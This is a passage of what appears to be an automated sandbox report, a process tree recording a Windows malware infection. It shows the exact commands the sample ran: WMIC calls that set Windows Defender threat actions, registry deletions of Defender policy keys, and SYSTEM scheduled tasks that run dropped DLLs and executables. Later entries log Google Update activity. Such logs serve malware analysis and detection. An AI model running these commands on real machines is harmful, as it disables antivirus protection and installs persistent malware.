C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\wnHGCh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\GuuvQhZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\danbnxy.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\rndiaJY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\KmRGupP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\uLOdOcw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 09:11:30 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\MrUxRnjv\vJCqdIP.dll\",#1 /site_id 394347" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TzpzstmaipgnuWYOU"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuzKSvQhhvm" /SC once /ST 02:24:24 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\tZFXiuRN\YuDaebe.exe\" vm /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuzKSvQhhvm"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuzKSvQhhvm"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuzKSvQhhvm"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\MrUxRnjv\vJCqdIP.dll",#1 /site_id 3943472⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\MrUxRnjv\vJCqdIP.dll",#1 /site_id 3943473⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TzpzstmaipgnuWYOU"4⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\tZFXiuRN\YuDaebe.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\tZFXiuRN\YuDaebe.exe vm /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Roaming\bdbwwjcC:\Users\Admin\AppData\Roaming\bdbwwjc2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\bdbwwjcC:\Users\Admin\AppData\Roaming\bdbwwjc3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\bhbwwjcC:\Users\Admin\AppData\Roaming\bhbwwjc2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={69f95f6a-9d33-4d42-8414-019797d43f6d} --system2⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\GoogleUpdateSetup.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir644_276973879\GoogleUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent3⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleUpdate.exe"C:\Program Files (x86)\Google\Temp\GUMC729.tmp\GoogleUpdate.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMTEiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MTYxMjMyNjktMjRDMi00REQxLTk0NjAtRjZCMUEwOTVEOTU5fSIgdXNlcmlkPSJ7QjJEMzAzMzktOUFDNC00NDYxLTk2RUEtQ0ZBMEE3MjRDQ0I5fSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0iezM2QjBFQTUxLThDQTItNEUyQi04OThFLUI1NTUwNzNBNDE5NH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iNCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMCIgc3NlNDE9IjAiIHNzZTQyPSIwIiBhdng9IjAiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjExMSIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjA0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /machine /installsource chromerecovery3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\Install\{67291D7E-0687-4F58-A8D6-C6868C2FA1DC}\GoogleUpdateSetup.exe"C:\Program Files (x86)\Google\Update\Install\{67291D7E-0687-4F58-A8D6-C6868C2FA1DC}\GoogleUpdateSetup.exe" /update /sessionid "{CF1A28BF-2DCD-455D-949B-9595B79C53DF}"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\GoogleUpdate.exe"C:\Program Files (x86)\Google\Temp\GUM86EF.tmp\GoogleUpdate.exe" /update /sessionid "{CF1A28BF-2DCD-455D-949B-9595B79C53DF}"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0YxQTI4QkYtMkRDRC00NTVELTk0OUItOTU5NUI3OUM1M0RGfSIgdXNlcmlkPSJ7QjJEMzAzMzktOUFDNC00NDYxLTk2RUEtQ0ZBMEE3MjRDQ0I5fSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTQyODUwOEItNjJGRS00QTNELTkyODAtOTI3NUYxNTk5RDBBfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBwaHlzbWVtb3J5PSI0IiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIwIiBzc2U0MT0iMCIgc3NlNDI9IjAiIGF2eD0iMCIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIxLjMuMzYuMTExIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjExMiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjaHJvbWVyZWMzPTIwMjE0MFIiIGluc3RhbGxhZ2U9IjExIiBpbnN0YWxsZGF0ZT0iNTM4MyIgY29ob3J0PSIxOjljbzoiIGNvaG9ydG5hbWU9IkV2ZXJ5b25lIEVsc2UiPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48L2FwcD48L3JlcXVlc3Q-4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleCrashHandler.exe"C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleCrashHandler.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleCrashHandler64.exe"C:\Program Files (x86)\Google\Update\1.3.36.111\GoogleCrashHandler64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMTEiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0YxQTI4QkYtMkRDRC00NTVELTk0OUItOTU5NUI3OUM1M0RGfSIgdXNlcmlkPSJ7QjJEMzAzMzktOUFDNC00NDYxLTk2RUEtQ0ZBMEE3MjRDQ0I5fSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0iezJCOTMxQUI0LURBM0ItNDk2RC05OTUwLUJDREMyODQzQjUwRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iNCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMCIgc3NlNDE9IjAiIHNzZTQyPSIwIiBhdng9IjAiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjExMSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMTIiIGxhbmc9IiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY2hyb21lcmVjMz0yMDIxNDBSIiBpbnN0YWxsYWdlPSIxMSIgaWlkPSJ7OEQ4QjE0NjAtMzA3NS00RjI3LUQ4MzEtOEMwMTU3QkIzNjYwfSIgY29ob3J0PSIxOjljbzoiIGNvaG9ydG5hbWU9IkV2ZXJ5b25lIEVsc2UiPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi91cGRhdGUyL2FkeG1vbWZ0cmtvaW9kazdhd3l2YTNtejZ1dGFfMS4zLjM2LjExMi9Hb29nbGVVcGRhdGVTZXR1cC5leGUiIGRvd25sb2FkZWQ9IjEzNDEyNzIiIHRvdGFsPSIxMzQxMjcyIiBkb3dubG9hZF90aW1lX21zPSI1MTkiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PC9hcHA-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzQy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249Ijg5LjAuNDM4OS4xMTQiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjaHJvbWVyZWMzPTIwMjE0MFIiIGluc3RhbGxhZ2U9IjExIiBpaWQ9Ins4RDhCMTQ2MC0zMDc1LTRGMjctRDgzMS04QzAxNTdCQjM2NjB9Ij48ZXZlbnQgZXZlb